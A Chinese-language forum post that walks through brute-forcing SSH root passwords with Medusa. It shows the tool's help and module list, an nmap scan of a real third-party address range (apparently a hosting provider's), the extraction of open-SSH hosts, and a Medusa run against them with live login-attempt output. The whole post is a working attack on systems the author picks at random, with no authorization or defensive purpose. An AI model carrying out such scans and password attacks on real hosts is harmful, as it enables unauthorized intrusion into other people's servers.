随手写一下,medusa破解起来还是比较快的,首先我们看看帮助
root@perl-exploit:/pentest/exploits/framework3#medusa
Medusav1.5[http://www.foofus.net](C)JoMo-Kun/FoofusNetworks
ALERT:Hostinformationmustbesupplied.
Syntax:Medusa[-hhost|-Hfile][-uusername|-Ufile][-ppassword|-Pfile][-Cfile]-Mmodule[OPT]
-h[TEXT]:TargethostnameorIPaddress
-H[FILE]:FilecontainingtargethostnamesorIPaddresses
-u[TEXT]:Usernametotest
-U[FILE]:Filecontainingusernamestotest
-p[TEXT]:Passwordtotest
-P[FILE]:Filecontainingpasswordstotest
-C[FILE]:Filecontainingcomboentries.SeeREADMEformoreinformation.
-O[FILE]:Filetoappendloginformationto
-e[n/s/ns]:Additionalpasswordchecks([n]NoPassword,[s]Password=Username)
-M[TEXT]:Nameofthemoduletoexecute(withoutthe.modextension)
-m[TEXT]:Parametertopasstothemodule.Thiscanbepassedmultipletimeswitha
differentparametereachtimeandtheywillallbesenttothemodule(i.e.
-mParam1-mParam2,etc.)
-d:Dumpallknownmodules
-n[NUM]:Usefornon-defaultTCPportnumber
-s:EnableSSL
-g[NUM]:GiveupaftertryingtoconnectforNUMseconds(default3)
-r[NUM]:SleepNUMsecondsbetweenretryattempts(default3)
-R[NUM]:AttemptNUMretriesbeforegivingup.ThetotalnumberofattemptswillbeNUM+1.
-t[NUM]:Totalnumberofloginstobetestedconcurrently
-T[NUM]:Totalnumberofhoststobetestedconcurrently
-L:Parallelizeloginsusingoneusernameperthread.Thedefaultistoprocess
theentireusernamebeforeproceeding.
-f:Stopscanninghostafterfirstvalidusername/passwordfound.
-F:Stopauditafterfirstvalidusername/passwordfoundonanyhost.
-b:Suppressstartupbanner
-q:Displaymodule’susageinformation
-v[NUM]:Verboselevel[0-6(more)]
-w[NUM]:Errordebuglevel[0-10(more)]
-V:Displayversion
-Z[NUM]:Resumescanfromhost#
ok,我们看看medusa有哪些模块支持什么功能的破解
root@perl-exploit:/pentest/exploits/framework3#medusa-d
Medusav1.5[http://www.foofus.net](C)JoMo-Kun/FoofusNetworks
Availablemodulesin“.”:
Availablemodulesin“/usr/lib/medusa/modules”:
+cvs.mod:BruteforcemoduleforCVSsessions:version1.0.0
+ftp.mod:BruteforcemoduleforFTP/FTPSsessions:version1.3.0
+http.mod:BruteforcemoduleforHTTP:version1.3.0
+imap.mod:BruteforcemoduleforIMAPsessions:version1.2.0
+mssql.mod:BruteforcemoduleforM$-SQLsessions:version1.1.1
+mysql.mod:BruteforcemoduleforMySQLsessions:version1.2
+ncp.mod:BruteforcemoduleforNCPsessions:version1.0.0
+nntp.mod:BruteforcemoduleforNNTPsessions:version1.0.0
+pcanywhere.mod:BruteforcemoduleforPcAnywheresessions:version1.0.2
+pop3.mod:BruteforcemoduleforPOP3sessions:version1.2
+postgres.mod:BruteforcemoduleforPostgreSQLsessions:version1.0.0
+rexec.mod:BruteforcemoduleforREXECsessions:version1.1.1
+rlogin.mod:BruteforcemoduleforRLOGINsessions:version1.0.2
+rsh.mod:BruteforcemoduleforRSHsessions:version1.0.1
+smbnt.mod:BruteforcemoduleforSMB(LM/NTLM/LMv2/NTLMv2)sessions:version1.5
+smtp-vrfy.mod:BruteforcemoduleforenumeratingaccountsviaSMTPVRFY:version1.0.0
+smtp.mod:BruteforcemoduleforSMTPAuthenticationwithTLS:version1.0.0
+snmp.mod:BruteforcemoduleforSNMPCommunityStrings:version1.0.0
+ssh.mod:BruteforcemoduleforSSHv2sessions:version1.0.2
+svn.mod:BruteforcemoduleforSubversionsessions:version1.0.0
+telnet.mod:Bruteforcemodulefortelnetsessions:version1.2.2
+vmauthd.mod:BruteforcemodulefortheVMwareAuthenticationDaemon:version1.0.1
+vnc.mod:BruteforcemoduleforVNCsessions:version1.0.1
+web-form.mod:Bruteforcemoduleforwebforms:version1.0.0
+wrapper.mod:GenericWrapperModule:version1.0.1
恩,我们要破解ssh,所以用-Mssh参数加载ssh模块,后面不用跟.mod
首先我们确定目标,扫描开放ssh的机器,随便找个段扫描一下吧
root@perl-exploit:/pentest#nmap-sV-p22-oGssh69.163.190.0/24
然后是漫长的等待,上面的参数扫描意思是,扫描整个段开了22端口的机器,并且判断服务版本,保存到ssh文件中。
然后我们查看扫描结果
root@perl-exploit:/pentest#catssh
#Nmap5.00scaninitiatedTueJun2202:18:282010as:nmap-sV-p22-oGssh69.163.190.0/24
Host:69.163.190.1(ip-69-163-190-1.dreamhost.com)Ports:22/closed/tcp//ssh///
Host:69.163.190.2(ip-69-163-190-2.dreamhost.com)Ports:22/closed/tcp//ssh///
Host:69.163.190.3(ip-69-163-190-3.dreamhost.com)Ports:22/closed/tcp//ssh///
Host:69.163.190.4(dragich.shaggy.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.5(myrck.spongebob.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.6(apache2-twang.luthor.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.7(ps11591.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.8(ps10854.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.9(rangerjill.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.10(ouellette.yogi.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.11(psmysql11957.dreamhostps.com)Ports:22/open/tcp//ssh//OpenSSH4.3p2Debian9etch2(protocol2.0)/
Host:69.163.190.12(rubeo.yogi.dreamhost.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
Host:69.163.190.13(alt-malware.com)Ports:22/open/tcp//ssh//OpenSSH5.1p1Debian5(protocol2.0)/
类似这样的,这里我们要整理一下,把开了ssh的IP整理出来,现在明白oG保存的意义所在了
root@perl-exploit:/pentest#grep22/openssh|cut-d””-f2>>ssh1.txt
这条命令里用到了cut,详细用法为就不罗嗦了。查看结果
root@perl-exploit:/pentest#catssh1.txt
69.163.190.4
69.163.190.5
69.163.190.6
69.163.190.7
69.163.190.8
69.163.190.9
69.163.190.10
69.163.190.11
69.163.190.12
69.163.190.13
69.163.190.14
69.163.190.15
69.163.190.16
69.163.190.17
69.163.190.18
69.163.190.19
69.163.190.22
69.163.190.23
69.163.190.24
69.163.190.25
69.163.190.26
69.163.190.27
69.163.190.28
69.163.190.29
69.163.190.30
69.163.190.31
69.163.190.32
69.163.190.33
69.163.190.34
69.163.190.35
69.163.190.36
69.163.190.37
69.163.190.38
69.163.190.39
69.163.190.40
69.163.190.41
69.163.190.42
69.163.190.43
69.163.190.44
69.163.190.45
69.163.190.46
69.163.190.47
69.163.190.48
69.163.190.49
69.163.190.50
69.163.190.51
69.163.190.52
69.163.190.53
变成这样的了,接下来,我们开始随便找个字典,开始破解ssh密码
root@perl-exploit:/pentest#medusa-Hssh1.txt-uroot-Pp.txt-Mssh
root@perl-exploit:/pentest#medusa-Hssh1.txt-uroot-Pp.txt-Mssh
Medusav1.5[http://www.foofus.net](C)JoMo-Kun/FoofusNetworks
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:root(1of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:admin(2of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:oracle(3of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:tomcat(4of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:postgres(5of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:webmin(6of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.4(1of235,1complete)User:root(1of1,1complete)Password:fuckyou(7of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.5(2of235,2complete)User:root(1of1,1complete)Password:root(1of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.5(2of235,2complete)User:root(1of1,1complete)Password:admin(2of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.5(2of235,2complete)User:root(1of1,1complete)Password:oracle(3of7complete)
ACCOUNTCHECK:[ssh]Host:69.163.190.5(2of235,2complete)User:root(1of1,1complete)Password:tomcat(4of7complete)
ok,等吧,这段时间你可以那啥一下,或者找个那啥片那啥一下,结果最后会自动显示。
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡